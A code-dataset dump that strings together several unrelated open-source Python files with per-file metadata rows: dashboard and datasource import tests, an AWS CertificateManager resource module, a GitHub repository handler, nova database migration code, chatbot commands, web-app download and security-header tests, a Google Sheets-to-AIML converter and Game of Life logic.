b_slc = self.create_slice("b_slc", id=10010, table_name="birth_names")
dash_to_import = self.create_dashboard(
"override_dashboard", slcs=[e_slc, b_slc], id=10004
)
imported_dash_id_1 = models.Dashboard.import_obj(
dash_to_import, import_time=1992
)
# create new instances of the slices
e_slc = self.create_slice("e_slc", id=10009, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10010, table_name="birth_names")
c_slc = self.create_slice("c_slc", id=10011, table_name="birth_names")
dash_to_import_override = self.create_dashboard(
"override_dashboard_new", slcs=[e_slc, b_slc, c_slc], id=10004
)
imported_dash_id_2 = models.Dashboard.import_obj(
dash_to_import_override, import_time=1992
)
# override doesn't change the id
self.assertEqual(imported_dash_id_1, imported_dash_id_2)
expected_dash = self.create_dashboard(
"override_dashboard_new", slcs=[e_slc, b_slc, c_slc], id=10004
)
make_transient(expected_dash)
imported_dash = self.get_dash(imported_dash_id_2)
self.assert_dash_equals(expected_dash, imported_dash, check_position=False)
self.assertEqual(
{"remote_id": 10004, "import_time": 1992},
json.loads(imported_dash.json_metadata),
)
def test_import_new_dashboard_slice_reset_ownership(self):
admin_user = security_manager.find_user(username="admin")
self.assertTrue(admin_user)
gamma_user = security_manager.find_user(username="gamma")
self.assertTrue(gamma_user)
g.user = gamma_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10200)
# set another user as an owner of importing dashboard
dash_with_1_slice.created_by = admin_user
dash_with_1_slice.changed_by = admin_user
dash_with_1_slice.owners = [admin_user]
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
def test_import_override_dashboard_slice_reset_ownership(self):
admin_user = security_manager.find_user(username="admin")
self.assertTrue(admin_user)
gamma_user = security_manager.find_user(username="gamma")
self.assertTrue(gamma_user)
g.user = gamma_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10300)
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
# re-import with another user shouldn't change the permissions
g.user = admin_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10300)
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
def _create_dashboard_for_import(self, id_=10100):
slc = self.create_slice("health_slc" + str(id_), id=id_ + 1)
dash_with_1_slice = self.create_dashboard(
"dash_with_1_slice" + str(id_), slcs=[slc], id=id_ + 2
)
dash_with_1_slice.position_json = """
{{"DASHBOARD_VERSION_KEY": "v2",
"DASHBOARD_CHART_TYPE-{0}": {{
"type": "DASHBOARD_CHART_TYPE",
"id": {0},
"children": [],
"meta": {{
"width": 4,
"height": 50,
"chartId": {0}
}}
}}
}}
""".format(
slc.id
)
return dash_with_1_slice
def test_import_table_no_metadata(self):
table = self.create_table("pure_table", id=10001)
imported_id = SqlaTable.import_obj(table, import_time=1989)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
def test_import_table_1_col_1_met(self):
table = self.create_table(
"table_1_col_1_met", id=10002, cols_names=["col1"], metric_names=["metric1"]
)
imported_id = SqlaTable.import_obj(table, import_time=1990)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990, "database_name": "examples"},
json.loads(imported.params),
)
def test_import_table_2_col_2_met(self):
table = self.create_table(
"table_2_col_2_met",
id=10003,
cols_names=["c1", "c2"],
metric_names=["m1", "m2"],
)
imported_id = SqlaTable.import_obj(table, import_time=1991)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
def test_import_table_override(self):
table = self.create_table(
"table_override", id=10003, cols_names=["col1"], metric_names=["m1"]
)
imported_id = SqlaTable.import_obj(table, import_time=1991)
table_over = self.create_table(
"table_override",
id=10003,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_over_id = SqlaTable.import_obj(table_over, import_time=1992)
imported_over = self.get_table(imported_over_id)
self.assertEqual(imported_id, imported_over.id)
expected_table = self.create_table(
"table_override",
id=10003,
metric_names=["new_metric1", "m1"],
cols_names=["col1", "new_col1", "col2", "col3"],
)
self.assert_table_equals(expected_table, imported_over)
def test_import_table_override_identical(self):
table = self.create_table(
"copy_cat",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id = SqlaTable.import_obj(table, import_time=1993)
copy_table = self.create_table(
"copy_cat",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id_copy = SqlaTable.import_obj(copy_table, import_time=1994)
self.assertEqual(imported_id, imported_id_copy)
self.assert_table_equals(copy_table, self.get_table(imported_id))
def test_import_druid_no_metadata(self):
datasource = self.create_druid_datasource("pure_druid", id=10001)
imported_id = DruidDatasource.import_obj(datasource, import_time=1989)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
def test_import_druid_1_col_1_met(self):
datasource = self.create_druid_datasource(
"druid_1_col_1_met", id=10002, cols_names=["col1"], metric_names=["metric1"]
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1990)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990, "database_name": "druid_test"},
json.loads(imported.params),
)
def test_import_druid_2_col_2_met(self):
datasource = self.create_druid_datasource(
"druid_2_col_2_met",
id=10003,
cols_names=["c1", "c2"],
metric_names=["m1", "m2"],
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1991)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
def test_import_druid_override(self):
datasource = self.create_druid_datasource(
"druid_override", id=10004, cols_names=["col1"], metric_names=["m1"]
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1991)
table_over = self.create_druid_datasource(
"druid_override",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_over_id = DruidDatasource.import_obj(table_over, import_time=1992)
imported_over = self.get_datasource(imported_over_id)
self.assertEqual(imported_id, imported_over.id)
expected_datasource = self.create_druid_datasource(
"druid_override",
id=10004,
metric_names=["new_metric1", "m1"],
cols_names=["col1", "new_col1", "col2", "col3"],
)
self.assert_datasource_equals(expected_datasource, imported_over)
def test_import_druid_override_identical(self):
datasource = self.create_druid_datasource(
"copy_cat",
id=10005,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1993)
copy_datasource = self.create_druid_datasource(
"copy_cat",
id=10005,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id_copy = DruidDatasource.import_obj(copy_datasource, import_time=1994)
self.assertEqual(imported_id, imported_id_copy)
self.assert_datasource_equals(copy_datasource, self.get_datasource(imported_id))
if __name__ == "__main__":
unittest.main()
|
apache-2.0
| -5,938,705,838,612,700,000
| 40.494253
| 91
| 0.604778
| false
| 3.549656
| true
| false
| false
|
cloudtools/troposphere
|
troposphere/certificatemanager.py
|
1
|
1246
|
# Copyright (c) 2012-2021, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 31.1.0
from troposphere import Tags
from . import AWSObject, AWSProperty
from .validators import integer
class ExpiryEventsConfiguration(AWSProperty):
props = {
"DaysBeforeExpiry": (integer, False),
}
class Account(AWSObject):
resource_type = "AWS::CertificateManager::Account"
props = {
"ExpiryEventsConfiguration": (ExpiryEventsConfiguration, True),
}
class DomainValidationOption(AWSProperty):
props = {
"DomainName": (str, True),
"HostedZoneId": (str, False),
"ValidationDomain": (str, False),
}
class Certificate(AWSObject):
resource_type = "AWS::CertificateManager::Certificate"
props = {
"CertificateAuthorityArn": (str, False),
"CertificateTransparencyLoggingPreference": (str, False),
"DomainName": (str, True),
"DomainValidationOptions": ([DomainValidationOption], False),
"SubjectAlternativeNames": ([str], False),
"Tags": ((Tags, list), False),
"ValidationMethod": (str, False),
}
|
bsd-2-clause
| -346,566,488,791,936,300
| 24.428571
| 71
| 0.658106
| false
| 3.968153
| false
| false
| false
|
QLGu/djangopackages
|
package/repos/github.py
|
2
|
2521
|
from time import sleep
from django.conf import settings
from django.utils import timezone
from github3 import GitHub, login
import requests
from base_handler import BaseHandler
from package.utils import uniquer
class GitHubHandler(BaseHandler):
title = "Github"
url_regex = '(http|https|git)://github.com/'
url = 'https://github.com'
repo_regex = r'(?:http|https|git)://github.com/[^/]*/([^/]*)/{0,1}'
slug_regex = repo_regex
def __init__(self):
if settings.GITHUB_TOKEN:
self.github = login(token=settings.GITHUB_TOKEN)
else:
self.github = GitHub()
def manage_ratelimit(self):
while self.github.ratelimit_remaining < 10:
sleep(1)
def _get_repo(self, package):
repo_name = package.repo_name()
if repo_name.endswith("/"):
repo_name = repo_name[:-1]
try:
username, repo_name = package.repo_name().split('/')
except ValueError:
return None
return self.github.repository(username, repo_name)
def fetch_metadata(self, package):
self.manage_ratelimit()
repo = self._get_repo(package)
if repo is None:
return package
package.repo_watchers = repo.watchers
package.repo_forks = repo.forks
package.repo_description = repo.description
contributors = []
for contributor in repo.iter_contributors():
contributors.append(contributor.login)
self.manage_ratelimit()
if contributors:
package.participants = ','.join(uniquer(contributors))
return package
def fetch_commits(self, package):
self.manage_ratelimit()
repo = self._get_repo(package)
if repo is None:
return package
from package.models import Commit # Added here to avoid circular imports
for commit in repo.iter_commits():
self.manage_ratelimit()
try:
commit_record, created = Commit.objects.get_or_create(
package=package,
commit_date=commit.commit.committer['date']
)
if not created:
break
except Commit.MultipleObjectsReturned:
continue
# If the commit record already exists, it means we are at the end of the
# list we want to import
package.save()
return package
repo_handler = GitHubHandler()
|
mit
| 5,148,200,768,411,809,000
| 27.977011
| 84
| 0.589052
| false
| 4.384348
| false
| false
| false
|
gyang/nova
|
nova/db/sqlalchemy/migration.py
|
1
|
4780
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import distutils.version as dist_version
import os
import sys
from nova.db.sqlalchemy.session import get_engine
from nova import exception
from nova import flags
import sqlalchemy
import migrate
from migrate.versioning import util as migrate_util
@migrate_util.decorator
def patched_with_engine(f, *a, **kw):
url = a[0]
engine = migrate_util.construct_engine(url, **kw)
try:
kw['engine'] = engine
return f(*a, **kw)
finally:
if isinstance(engine, migrate_util.Engine) and engine is not url:
migrate_util.log.debug('Disposing SQLAlchemy engine %s', engine)
engine.dispose()
# TODO(jkoelker) When migrate 0.7.3 is released and nova depends
# on that version or higher, this can be removed
MIN_PKG_VERSION = dist_version.StrictVersion('0.7.3')
if (not hasattr(migrate, '__version__') or
dist_version.StrictVersion(migrate.__version__) < MIN_PKG_VERSION):
migrate_util.with_engine = patched_with_engine
# NOTE(jkoelker) Delay importing migrate until we are patched
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
try:
from migrate.versioning import exceptions as versioning_exceptions
except ImportError:
try:
# python-migration changed location of exceptions after 1.6.3
# See LP Bug #717467
from migrate import exceptions as versioning_exceptions
except ImportError:
sys.exit(_("python-migrate is not installed. Exiting."))
FLAGS = flags.FLAGS
_REPOSITORY = None
def db_sync(version=None):
if version is not None:
try:
version = int(version)
except ValueError:
raise exception.Error(_("version should be an integer"))
current_version = db_version()
repository = _find_migrate_repo()
if version is None or version > current_version:
return versioning_api.upgrade(get_engine(), repository, version)
else:
return versioning_api.downgrade(get_engine(), repository,
version)
def db_version():
repository = _find_migrate_repo()
try:
return versioning_api.db_version(get_engine(), repository)
except versioning_exceptions.DatabaseNotControlledError:
# If we aren't version controlled we may already have the database
# in the state from before we started version control, check for that
# and set up version_control appropriately
meta = sqlalchemy.MetaData()
engine = get_engine()
meta.reflect(bind=engine)
try:
for table in ('auth_tokens', 'zones', 'export_devices',
'fixed_ips', 'floating_ips', 'instances',
'key_pairs', 'networks', 'projects', 'quotas',
'security_group_instance_association',
'security_group_rules', 'security_groups',
'services', 'migrations',
'users', 'user_project_association',
'user_project_role_association',
'user_role_association',
'virtual_storage_arrays',
'volumes', 'volume_metadata',
'volume_types', 'volume_type_extra_specs'):
assert table in meta.tables
return db_version_control(1)
except AssertionError:
return db_version_control(0)
def db_version_control(version=None):
repository = _find_migrate_repo()
versioning_api.version_control(get_engine(), repository, version)
return version
def _find_migrate_repo():
"""Get the path for the migrate repository."""
global _REPOSITORY
path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'migrate_repo')
assert os.path.exists(path)
if _REPOSITORY is None:
_REPOSITORY = Repository(path)
return _REPOSITORY
|
apache-2.0
| 6,008,023,316,838,071,000
| 34.93985
| 78
| 0.64477
| false
| 4.27932
| false
| false
| false
|
Mego/DataBot
|
SE-Chatbot/botbuiltins/utils.py
|
1
|
4260
|
from Module import Command
from datetime import datetime
from requests import HTTPError
import re
import os
from ChatExchange3.chatexchange3.messages import Message
def command_alive(cmd, bot, args, msg, event):
return "Yes, I'm alive."
def command_utc(cmd, bot, args, msg, event):
return datetime.utcnow().ctime()
def command_listcommands(cmd, bot, args, msg, event):
if len(args) == 0:
return "Commands:%s%s" % (os.linesep, ', '.join([command.name for command in bot.modules.list_commands()]))
elif len(args) == 1:
module = bot.modules.find_module_by_name(args[0])
if module is None:
return "That module does not exist, or it is disabled."
cmds = module.list_commands()
if len(cmds) == 0:
return "No commands found in `%s`." % args[0]
return "Commands in `%s`:%s%s" % (args[0], os.linesep, ', '.join([command.name for command in cmds]))
else:
return "0 or 1 argument(s) expected."
#def parse_cat_command(cmd):
# if cmd.startswith("cat "):
# return [cmd[4:]]
# else:
# return False
def command_help(cmd, bot, args, msg, event):
if len(args) == 0:
return "I'm $BOT_NAME, $OWNER_NAME's chatbot. You can find the source code [on GitHub]($GITHUB). You can get a list of all commands by running `$PREFIXlistcommands`, or you can run `$PREFIXhelp command` to learn more about a specific command."
return bot.modules.get_help(args[0]) or "The command you want to look up does not exist."
#def command_cat(cmd, bot, args, msg, event):
# return args[0]
def command_read(cmd, bot, args, msg, event):
if len(args) == 0:
return "No message id/link supplied."
else:
message = []
for msg_id in args:
if msg_id.isdigit():
m_id = int(msg_id)
elif msg_id.split("#")[-1].isdigit():
m_id = int(msg_id.split("#")[-1])
elif msg_id.split("/")[-1].isdigit():
m_id = int(msg_id.split("/")[-1])
else:
return msg_id + " is not a valid message id/link."
try:
message += [re.sub(r'^:[0-9]+ ', '', Message(m_id, bot.client).content_source)]
except HTTPError:
return msg_id + ": message not found."
return ' '.join(message)
#def command_getcurrentusers(cmd, bot, args, msg, event):
# try:
# users = bot.room.get_current_user_names()
# except HTTPError:
# return "HTTPError when executing the command; please try again."
# except ConnectionError:
# return "ConnectionError when executing the command; please try again."
# users = [x.encode('ascii', errors='replace').decode('unicode_escape') for x in users]
# if len(args) > 0 and args[0] == "pingformat":
# users = [x.replace(" ", "") for x in users]
# return " ".join(users)
# return ", ".join(users)
#def command_ping(cmd, bot, args, msg, event):
# if len(args) == 0:
# return "No arguments supplied"
# else:
# return " ".join(["@" + arg for arg in args])
commands = [Command('alive', command_alive, "A command to see whether the bot is there. Syntax: `$PREFIXalive`", False, False),
Command('utc', command_utc, "Shows the current UTC time. Syntax: `$PREFIXutc`", False, False),
Command('listcommands', command_listcommands, "Returns a list of all commands. Syntax: `$PREFIXlistcommands`", False, False),
Command('help', command_help, "Shows information about the chat bot, or about a specific command. Syntax: `$PREFIXhelp [ command ]`", False, False),
#Command('cat', command_cat, "Repeats what you said back at you. Syntax: `$PREFIXcat something`", False, False, parse_cat_command, None, None, None),
Command('read', command_read, "Reads a post to you. Syntax: `$PREFIXread [ message_id ] ...`", False, False),
#Command('getcurrentusers', command_getcurrentusers, "Shows the current users of a room. Syntax: `$PREFIXgetcurrentusers`", False, False),
#Command('ping', command_ping, "Pings a list of users for you. Syntax: `$PREFIXping user [...]`", False, False, None, None, None, None)
]
module_name = "utils"
|
mit
| 6,625,686,474,243,252,000
| 42.469388
| 251
| 0.609624
| false
| 3.532338
| false
| false
| false
|
ONSdigital/ras-frontstage
|
tests/integration/views/surveys/test_download_survey.py
|
1
|
4001
|
import json
import unittest
from unittest.mock import patch
import requests_mock
from flask import request
from frontstage import app
from tests.integration.mocked_services import (
business_party,
case,
collection_instrument_seft,
encoded_jwt_token,
survey,
url_banner_api,
)
@requests_mock.mock()
class TestDownloadSurvey(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
self.app.set_cookie("localhost", "authorization", "session_key")
self.headers = {
"Authorization": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoicmluZ3JhbUBub3d3aGVyZS5jb20iLCJ1c2VyX3Njb3BlcyI6WyJjaS5yZWFkIiwiY2kud3JpdGUiXX0.se0BJtNksVtk14aqjp7SvnXzRbEKoqXb8Q5U9VVdy54" # NOQA
}
self.patcher = patch("redis.StrictRedis.get", return_value=encoded_jwt_token)
self.patcher.start()
def tearDown(self):
self.patcher.stop()
@patch("frontstage.controllers.collection_instrument_controller.download_collection_instrument")
@patch("frontstage.controllers.party_controller.is_respondent_enrolled")
@patch("frontstage.controllers.case_controller.get_case_by_case_id")
def test_download_survey_success(self, mock_request, get_case_by_id, _, download_collection_instrument):
mock_request.get(url_banner_api, status_code=404)
        payload = json.dumps(collection_instrument_seft)
        binary = " ".join(format(ord(letter), "b") for letter in payload)
get_case_by_id.return_value = case
headers = {"Content-type": "application/json", "Content-Length": "5962"}
download_collection_instrument.return_value = binary, headers
response = self.app.get(
f'/surveys/download-survey?case_id={case["id"]}&business_party_id={business_party["id"]}'
f'&survey_short_name={survey["shortName"]}'
)
self.assertEqual(response.status_code, 200)
def test_enforces_secure_headers(self, mock_request):
mock_request.get(url_banner_api, status_code=404)
with app.test_client() as client:
headers = client.get(
"/", headers={"X-Forwarded-Proto": "https"} # set protocol so that talisman sets HSTS headers
).headers
self.assertEqual("no-cache, no-store, must-revalidate", headers["Cache-Control"])
self.assertEqual("no-cache", headers["Pragma"])
self.assertEqual("max-age=31536000; includeSubDomains", headers["Strict-Transport-Security"])
self.assertEqual("DENY", headers["X-Frame-Options"])
self.assertEqual("1; mode=block", headers["X-Xss-Protection"])
self.assertEqual("nosniff", headers["X-Content-Type-Options"])
csp_policy_parts = headers["Content-Security-Policy"].split("; ")
self.assertIn("default-src 'self' https://cdn.ons.gov.uk", csp_policy_parts)
self.assertIn("font-src 'self' data: https://fonts.gstatic.com https://cdn.ons.gov.uk", csp_policy_parts)
self.assertIn(
"script-src 'self' https://www.googletagmanager.com https://cdn.ons.gov.uk 'nonce-{}'".format(
request.csp_nonce
),
csp_policy_parts,
)
# TODO: fix assertion error
# self.assertIn(
# "connect-src 'self' https://www.googletagmanager.com https://tagmanager.google.com https://cdn.ons.gov.uk "
# 'http://localhost:8082 ws://localhost:8082', csp_policy_parts)
self.assertIn(
"img-src 'self' data: https://www.gstatic.com https://www.google-analytics.com "
"https://www.googletagmanager.com https://ssl.gstatic.com https://cdn.ons.gov.uk",
csp_policy_parts,
)
self.assertIn(
"style-src 'self' https://cdn.ons.gov.uk 'unsafe-inline' https://tagmanager.google.com https://fonts.googleapis.com",
csp_policy_parts,
)
|
mit
| 3,429,505,770,575,708,700
| 44.988506
| 215
| 0.63859
| false
| 3.51273
| true
| false
| false
|
hansonrobotics/chatbot
|
src/chatbot/server/gsheet_chatter.py
|
1
|
8513
|
import os
import sys
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(CWD, '..'))
import aiml
import urllib
import csv
import logging
import glob
from csvUtils import generateAimlFromLongCSV, generateAimlFromSimpleCSV
import xml.etree.ElementTree as ET
logger = logging.getLogger('hr.chatbot.gsheet_chatter')
xmlns = '{http://www.w3.org/2005/Atom}'
def getWorkSheets(skey, dirname='.'):
urlwks = "https://spreadsheets.google.com/feeds/worksheets/<KEY>/public/full"
urlwks = urlwks.replace("<KEY>", skey)
wksData = urllib.urlopen(urlwks).read()
tree = ET.fromstring(wksData)
author = tree.find(xmlns + 'author')
name = author.find(xmlns + 'name').text
email = author.find(xmlns + 'email').text
aiml_files, csv_files = [], []
if not os.path.isdir(dirname):
os.makedirs(dirname)
for entry in tree.findall('{}entry'.format(xmlns)):
aimlFileData = None
csvData = None
title = None
for item in entry.iter():
if item.tag == xmlns + 'link' and item.attrib.get('type') == 'text/csv':
pagelink = item.attrib.get('href')
#pagelink = pagelink.replace('format=csv', 'format=tsv', )
csvData = loadSheetViaURL(pagelink)
aimlFileData = generateAimlFromCSV(csvData)
if item.tag == xmlns + 'title':
title = item.text
filename = os.path.join(
dirname, '{}_{}.aiml'.format(skey, title))
csv_fname = os.path.join(
dirname, '{}_{}.csv'.format(skey, title))
if title == 'question': # skip "question" sheet
continue
if csvData is not None:
with open(csv_fname, 'w') as f:
f.write(csvData)
csv_files.append(csv_fname)
if aimlFileData is not None:
with open(filename, 'w') as f:
f.write(aimlFileData)
aiml_files.append(filename)
return aiml_files, csv_files
# http://stackoverflow.com/questions/11290337/how-to-convert-google-spreadsheets-worksheet-string-id-to-integer-index-gid
def to_gid(worksheet_id):
return int(worksheet_id, 36) ^ 31578
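# Quick sanity check (assumption: 'od6' is the id Google commonly assigns to the
# first worksheet): int('od6', 36) == 31578, so the XOR maps it to gid 0.
#
#   >>> to_gid('od6')
#   0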
def loadSheet(skey, page):
#// REPLACE THIS WITH YOUR URL
logger.debug("PAGE:" + str(page))
logger.debug("GID :" + str(to_gid(str(page))))
urlcsv = "https://docs.google.com/spreadsheets/d/<KEY>/export?format=csv&id=<KEY>&gid=" + \
str(page) # +str(to_gid(str(page)))
urlcsv = urlcsv.replace("<KEY>", skey)
csvData = urllib.urlopen(urlcsv).read()
if ("DOCTYPE html" in csvData):
return ""
logger.debug("URL : " + urlcsv)
return csvData
def loadSheetViaURL(urlcsv):
csvData = urllib.urlopen(urlcsv).read()
if ("DOCTYPE html" in csvData):
return ""
logger.debug("URL : " + urlcsv)
return csvData
def generateAimlFromCSV(csvData, delimiter=','):
lines = csvData.splitlines()
if (len(lines) == 0):
return ""
header = lines[0]
aimlFile = '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
aimlFile += '<aiml>\n'
reader = csv.DictReader(lines, delimiter=delimiter)
for row in reader:
logger.debug(row)
slots = {}
slots['PATTERN'] = "*"
slots['THAT'] = "*"
slots['TEMPLATE'] = ""
slots['TOPIC'] = "*"
slots['REDUCE_TO'] = ""
category = " <category>\n <pattern>XPATTERN</pattern>\n <that>XTHAT</that>\n <template>XTEMPLATEXREDUCE</template>\n </category>\n"
if (('PATTERN' in row) and (row['PATTERN'] != "")):
slots['PATTERN'] = row['PATTERN'].upper()
if (('THAT' in row) and (row['THAT'] != "")):
slots['THAT'] = row['THAT']
if (('TEMPLATE' in row) and (row['TEMPLATE'] != "")):
slots['TEMPLATE'] = row['TEMPLATE'].replace("#Comma", ",")
if (('TOPIC' in row) and (row['TOPIC'] != "")):
slots['TOPIC'] = row['TOPIC']
if (('REDUCE_TO' in row) and (row['REDUCE_TO'] != "")):
slots['REDUCE_TO'] = "<srai>" + row['REDUCE_TO'] + "</srai>"
category = category.replace("XPATTERN", slots['PATTERN'])
category = category.replace("XTHAT", slots['THAT'])
category = category.replace("XTEMPLATE", slots['TEMPLATE'])
category = category.replace("XTOPIC", slots['TOPIC'])
category = category.replace("XREDUCE", slots['REDUCE_TO'])
aimlFile += category
aimlFile += "</aiml>"
return aimlFile
def readAndLoadSheets(sheetList, engine):
for sheetKey in sheetList:
aiml_files, _ = getWorkSheets(sheetKey)
for aiml_file in aiml_files:
engine.learn(aiml_file)
# for page in range(0,3):
# csvDat = loadSheet(sheetKey,int(page))
# aimlFileData = generateAimlFromCSV(csvDat)
# if (len(aimlFileData)==0): continue
# filename = sheetKey+"_"+str(page) +".aiml"
# target = open(filename, 'w')
# target.truncate()
# target.write(aimlFileData)
# target.close()
# engine.learn(filename)
# The Kernel object is the public interface to
# the AIML interpreter.
def get_csv_version(csv_file):
# Guessing
with open(csv_file) as f:
header = f.readline().strip()
if sorted(header.split(',')) == sorted(
['Human_says', 'Meaning', 'Robot_says']):
return "3"
elif sorted(header.split(',')) == sorted(
['Type', 'Pattern', 'That', 'Template', 'Source', 'Think', 'Topic']):
return "2"
else:
return "1"
def batch_csv2aiml(csv_dir, aiml_dir, csv_version=None):
"""Convert all the csv files in the csv_dir to aiml files.
csv_version:
1: PATTERN,THAT,TOPIC,TEMPLATE,REDUCE_TO
2: Type,Pattern,That,Template,Source,Think
3: Human_says,Meaning,Robot_says
"""
if not os.path.isdir(aiml_dir):
os.makedirs(aiml_dir)
aiml_files = []
csv_files = []
for csv_file in glob.glob('{}/*.csv'.format(csv_dir)):
filename = os.path.basename(csv_file)
filename = os.path.splitext(filename)[0] + '.aiml'
filename = os.path.join(aiml_dir, filename)
aimlFileData = None
with open(csv_file) as f:
if csv_version is None:
csv_version = get_csv_version(csv_file)
if csv_version == '1':
csvData = f.read()
aimlFileData = generateAimlFromCSV(csvData, ',')
elif csv_version == '2':
csvData = csv.DictReader(f)
try:
aimlFileData = generateAimlFromLongCSV(csvData)
except Exception as ex:
raise Exception('Generate aiml from csv {} error {}'.format(
os.path.basename(csv_file), ex))
elif csv_version == '3':
csvData = csv.DictReader(f)
try:
aimlFileData = generateAimlFromSimpleCSV(csvData)
except Exception as ex:
raise Exception('Generate aiml from csv {} error {}'.format(
os.path.basename(csv_file), ex))
if aimlFileData is not None:
with open(filename, 'w') as f:
f.write(aimlFileData)
logger.info("Convert {} to {}".format(csv_file, filename))
aiml_files.append(filename)
csv_files.append(csv_file)
return aiml_files, csv_files
if __name__ == '__main__':
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
k = aiml.Kernel()
# **************** CHANGE TO GOOGLE SHEET KEY HERE ***********************
sheetList = {"1Tbro_Kjbby162Rms0GpQswoqhavXOoRe85HVRyEB1NU"}
readAndLoadSheets(sheetList, k)
#csvDat = loadSheet(sheetKey)
# print "CSVDAT"
# print csvDat
#aimlFile = generateAimlFromCSV(csvDat)
# print aimlFile
# Use the 'learn' method to load the contents
# of an AIML file into the Kernel.
# k.learn("std-startup.xml")
# Use the 'respond' method to compute the response
# to a user's input string. respond() returns
# the interpreter's response, which in this case
# we ignore.
# k.respond("load aiml b")
# Loop forever, reading user input from the command
# line and printing responses.
while True:
userin = raw_input("> ")
print "raw response:" + k.respond(userin)
|
mit
| 3,803,464,178,213,337,600
| 34.619247
| 142
| 0.573828
| false
| 3.501851
| false
| false
| false
|
BradleyMoore/Game_of_Life
|
app/life.py
|
1
|
2134
|
from collections import Counter
import pygame
from constants import BOX, HEIGHT, WIDTH, SCREEN
class Cell(object):
def __init__(self, pos):
self.color = (255,0,0)
self.neighbors = 0
self.neighbor_list = []
self.pos = pos
self.x = pos[0]
self.y = pos[1]
def draw(self):
if self.x < 0 or self.x > WIDTH:
pass
elif self.y < 0 or self.y > HEIGHT:
pass
else:
pygame.draw.rect(SCREEN, self.color, (self.x*BOX, self.y*BOX, BOX, BOX))
def list_neighbors(self):
self.neighbor_list = []
for x in xrange(self.x-1, self.x+2):
for y in xrange(self.y-1, self.y+2):
self.neighbor_list.append((x,y))
self.neighbor_list.remove(self.pos)
return self.neighbor_list
class Pattern(object):
def __init__(self, name, pos):
self.name = name
self.pos = pos
self.x = pos[0]
self.y = pos[1]
def create_pattern(self):
from patterns import patterns
pattern = patterns[self.name]
coordinates = []
for y in xrange(len(pattern)):
for x in xrange(len(pattern[y])):
if pattern[y][x] == 1:
coordinates.append((self.x+x, self.y+y))
return coordinates
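# Illustrative sketch only: `patterns` (imported from patterns.py, not shown here)
# is assumed to map names to 0/1 grids that Pattern.create_pattern reads as
# pattern[y][x], e.g. a Conway glider:
#
#   patterns = {
#       'glider': [[0, 1, 0],
#                  [0, 0, 1],
#                  [1, 1, 1]],
#   }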
def create_life(life, neighbors):
from game import TO_BE_BORN, TO_LIVE
new_life = []
# turn neighbor positions into a list of tuples
neighbor_dict = Counter(neighbors)
neighbor_list = neighbor_dict.items()
life_pos = []
if life != None:
for cell in life:
life_pos.append(cell.pos)
for pos, count in neighbor_list:
# give birth to cells
if count in TO_BE_BORN and pos not in life_pos:
new_life.append(pos)
# cells staying alive
if count in TO_LIVE and pos in life_pos:
new_life.append(pos)
return new_life
